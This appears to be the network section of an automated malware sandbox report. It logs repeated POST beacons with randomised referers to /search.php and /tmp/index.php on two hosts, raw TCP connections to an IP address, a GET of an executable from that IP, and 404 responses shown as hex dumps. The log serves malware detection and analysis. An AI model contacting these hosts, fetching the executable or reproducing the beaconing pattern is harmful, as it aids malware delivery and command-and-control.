Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ffcibdqlkyf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ywfvqxxvpvjvadf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://dbbwmiqkkpy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://gklmvitduapshup.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jefnxxqxuxib.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://npjscmvmupb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ipmfrunnoji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wwkvkysjcmxmifd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dhwuphumqtqn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tkpgpviexggpuwvs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrbmtindhjismyee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ynepfbdxkuieepaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xkxmfugtrnxonclj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ymeegmcrvikfsv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnssdnlxskerq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vpprwqijyswgyjvy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ayjhmseqvvjye.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bnqsjigsukajkt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ejrqbeuhiivimsok.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yanbtiwxewyyhy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://frpabbqmujgvx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybeufjfqrbhah.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://astksdjaitsnxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ssdmhljrxull.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mshenhcpddejse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pjefvbuybfqlgx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fufaecmkeyed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://naauncqsbvtxnxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lcpcrwvedbvpllck.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lgertcnwaskqpc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fevqsrdkflt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://drnpfojnpvggv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ibetbbesaakqkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tyqfkmhoepxpii.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wyjfuitjcdhsl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ecpjrwjcauix.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bxntarqqdjdvdpxp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blfmqjnqqyje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gieuyuggiqfgtm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eankyeljcevd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://luejdvwxxrcvrqdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://svfopofgftavf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bprjpwpsmmrgaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ocnxfkuqumobjmad.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxdhacbibrdlwrt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nlmsxhroxptelhd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hikneccvvrshgb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com

Source: unknown

HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mcjvrcrjrartnd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: calvinandhalls.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:44 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:38:56 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:39:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:17 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:37 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:40:59 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 13:41:22 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:37:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
